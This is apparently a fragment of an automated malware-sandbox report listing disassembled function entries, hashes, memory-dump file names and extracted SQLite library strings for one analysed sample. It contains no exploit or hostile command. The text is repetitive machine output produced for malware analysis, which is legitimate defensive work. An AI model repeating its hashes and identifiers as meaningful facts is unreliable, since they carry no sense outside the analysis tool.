                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                • API String ID: 0-1873940834
                                                                • Opcode ID: 42dbc1e982a2a7a4fc9518e64b75df28cbcefa869c9db5e64dc2801f518bf0a3
                                                                • Instruction ID: 2dd40d87739213681c63e9e471657c55cf69af75c2efcb64ca82c749ae15dd60
                                                                • Opcode Fuzzy Hash: 42dbc1e982a2a7a4fc9518e64b75df28cbcefa869c9db5e64dc2801f518bf0a3
                                                                • Instruction Fuzzy Hash: ED412D72D0A345DBC3029F2888C166BF7E0BB99234F658B2BF966532A1D734D444CA83
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$tVj$d.
                                                                • API String ID: 0-1527448856
                                                                • Opcode ID: 1a95fb3ba36135ee5d5837ef73d7f31b68c5f5b283790a1bc53b75763eeb08f3
                                                                • Instruction ID: 02ca6372d1bc3966cc231ea2cbac2466c9df44d9b5554ec27dc7bd288b04bb01
                                                                • Opcode Fuzzy Hash: 1a95fb3ba36135ee5d5837ef73d7f31b68c5f5b283790a1bc53b75763eeb08f3
                                                                • Instruction Fuzzy Hash: 894125795042019AC713DF64EC40B7A77A5AF41328F05C469FA8987592E736F416CBB3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 06655a0ce435adf6b65fc807412dda07a2e85ca5f8a236e8c55058eba7a39e4e
                                                                • Instruction ID: e525b512242e4adfd7e227d1eca27bc2482097f61f0cccef554b0a81086c2ae8
                                                                • Opcode Fuzzy Hash: 06655a0ce435adf6b65fc807412dda07a2e85ca5f8a236e8c55058eba7a39e4e
                                                                • Instruction Fuzzy Hash: 00515E74418220DBDB006B74DDCCB2A37B8BF036DAF014268F90696611DB39E954DE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                                                • API String ID: 0-3074873597
                                                                • Opcode ID: 017699d65f87bc6a5273077cfba61be7f85fea214fd6362aa064cd33eabb0d93
                                                                • Instruction ID: e24a899f1bfccceb31e2243236230c0e6c0617dce669e677ce6c49134dfcc5ef
                                                                • Opcode Fuzzy Hash: 017699d65f87bc6a5273077cfba61be7f85fea214fd6362aa064cd33eabb0d93
                                                                • Instruction Fuzzy Hash: 2741BFB5604700AAE3105B14FC87BFA73B4DB413B9F04072AEA55C5592D769A59883E3
                                                                Strings
                                                                • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1D751E2C
                                                                • no such database: %s, xrefs: 1D751E05
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                                • API String ID: 0-1404816483
                                                                • Opcode ID: 656a7260131eebddaa7102f991c5a06936c1a8904599cd1fb6b5eddb6e5759b3
                                                                • Instruction ID: c105dcdee5698ed5d72428d98ce1f8211fba48e058f0d514a67521055892b646
                                                                • Opcode Fuzzy Hash: 656a7260131eebddaa7102f991c5a06936c1a8904599cd1fb6b5eddb6e5759b3
                                                                • Instruction Fuzzy Hash: A0313875608309ABD3105F69EC40B6BB7D8EF81227F024669FE5897211EB76F81087E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PRAGMA %Q.data_version
                                                                • API String ID: 0-2870853266
                                                                • Opcode ID: a2f1164be5fff331bb0c7945e99d2f11fbd0ba915d1d81465c82535b0db55654
                                                                • Instruction ID: deaa61877f2a271d0720b2fbbdd7de0fb4f9591c69cd3d06484053cb8bf3b1f1
                                                                • Opcode Fuzzy Hash: a2f1164be5fff331bb0c7945e99d2f11fbd0ba915d1d81465c82535b0db55654
                                                                • Instruction Fuzzy Hash: D111C6BAB043059FD700DE29FC40596F7E5EF88236F55453AEA4482611E736B81D8BA3
                                                                Strings
                                                                • misuse, xrefs: 1D769CFB
                                                                • API called with finalized prepared statement, xrefs: 1D769CE5
                                                                • %s at line %d of [%.10s], xrefs: 1D769D00
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D769CF1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3620335220
                                                                • Opcode ID: 466b5078724de853d9c856d4990998cee93370c04376bb4c28d1eb0c30007268
                                                                • Instruction ID: 14b54851cfee0275b97404493f914a5ba8789064a354560209744e1c70781b31
                                                                • Opcode Fuzzy Hash: 466b5078724de853d9c856d4990998cee93370c04376bb4c28d1eb0c30007268
                                                                • Instruction Fuzzy Hash: B011EB6AA04661A6E7115A29FC44BEB73989BC157EF01007BEE49D6212F710B88542F3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: af8fa9ab1684d0b498cce94413eb12abe2e66aa6f738011bb9a1295f3933c8bb
                                                                • Instruction ID: 25b9f217e85fee7596eb4c9599451692a82ee17c761a79fa1f779d01e65eff41
                                                                • Opcode Fuzzy Hash: af8fa9ab1684d0b498cce94413eb12abe2e66aa6f738011bb9a1295f3933c8bb
                                                                • Instruction Fuzzy Hash: D9F1F471A083419FD701CF28D88077ABBE0BF452B6F54466EE8998B352D336E945CB93
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb94665e7093b0115b187a042fa885e06008d89943150a2620147e3c07d18bfd
                                                                • Instruction ID: aec048e736596dabf9f5b7f37c346f74f9299fd56b9ce0d83049d28d94748667
                                                                • Opcode Fuzzy Hash: bb94665e7093b0115b187a042fa885e06008d89943150a2620147e3c07d18bfd
                                                                • Instruction Fuzzy Hash: 85817C715082119BE700DF28D884B6A77F4FF817A9F44056AFD449B251E73AE518CBB3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
                                                                • API String ID: 0-231581592
                                                                • Opcode ID: 2952bc8ffadfdb705aac92b176db0b093292b2c2e4342b4d2089aa1701c4ef2c
                                                                • Instruction ID: ef3b1cfaad111759200797ff1dbb612121ea4634543f57fb93c91a9fc77103f6
                                                                • Opcode Fuzzy Hash: 2952bc8ffadfdb705aac92b176db0b093292b2c2e4342b4d2089aa1701c4ef2c
                                                                • Instruction Fuzzy Hash: 94E1D3B4A08341ABDB01DF29C880B6AB7E4BF45724F05455CFA489B652F771E984CBE3
                                                                Strings
                                                                • recursively defined fts5 content table, xrefs: 1D756DE2
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: recursively defined fts5 content table
                                                                • API String ID: 0-437020801
                                                                • Opcode ID: 61d80fca683e4648899f91c50e4d85c3b221e7a20fa80164e9e7b0d077b9f3f3
                                                                • Instruction ID: 07768c0a0a12830b555325ba90ffd64a4dbbb2477f87b2636ebb0242fa5b84fa
                                                                • Opcode Fuzzy Hash: 61d80fca683e4648899f91c50e4d85c3b221e7a20fa80164e9e7b0d077b9f3f3
                                                                • Instruction Fuzzy Hash: F8D1BC759083418FDB04CF19E48076ABBE1FF89324F854A5FE8898B252D775E885CB93
                                                                Strings
                                                                • NEAR, xrefs: 1D7D642A
                                                                • fts5: syntax error near "%.*s", xrefs: 1D7D6436
                                                                • fts5 expression tree is too large (maximum depth %d), xrefs: 1D7D6349
                                                                • expected integer, got "%.*s", xrefs: 1D7D648D
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: NEAR$expected integer, got "%.*s"$fts5 expression tree is too large (maximum depth %d)$fts5: syntax error near "%.*s"
                                                                • API String ID: 0-2846580575
                                                                • Opcode ID: b925798923c507dc3f464d9e45e522633160a4d54ab3c4e08fae90979f0ddfdf
                                                                • Instruction ID: 8683552b01cdd0e7da7cebf69f703fa5c93bd0884c65605f3abcf4f28654ab47
                                                                • Opcode Fuzzy Hash: b925798923c507dc3f464d9e45e522633160a4d54ab3c4e08fae90979f0ddfdf
                                                                • Instruction Fuzzy Hash: 1AC1A3F990470AEFC7518F64C940B6EF7A8FF08724F058A19E5455B252E371F660CBA2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 8370c73584c75d50d60ef65cac87d75a29f285283808bfa23f6302763e147395
                                                                • Instruction ID: 4d46eaeb2a0040b1d93c753a81cdc044c6f1a9613b2d2089f871edb09eaa72e3
                                                                • Opcode Fuzzy Hash: 8370c73584c75d50d60ef65cac87d75a29f285283808bfa23f6302763e147395
                                                                • Instruction Fuzzy Hash: F7A19FB5A083019BD704DF59D880A6ABBE1FFC8624F49456EFD4897212E731E905CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: a465a168d6d86d7be2c4dc7145767f54dc61f7eb86a7c428b4897fd30075b0cd
                                                                • Instruction ID: 1dedb4b0681412c1c8b719415f06d7cd1822c33bbb6cdfb41a5004db69887136
                                                                • Opcode Fuzzy Hash: a465a168d6d86d7be2c4dc7145767f54dc61f7eb86a7c428b4897fd30075b0cd
                                                                • Instruction Fuzzy Hash: 05711571604755AFC341DF29DC81ABABBE0EF40225F45496EE9D9C3241E324FA58C7A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                • API String ID: 0-2528248365
                                                                • Opcode ID: 54b77380b5f256ece8117f86d73eabc8343a7c84aafdb997a0188d2075b03113
                                                                • Instruction ID: 6c8d900e50ed83d205fa399f34235af6d6137ce0b09381776fd8b49123072a91
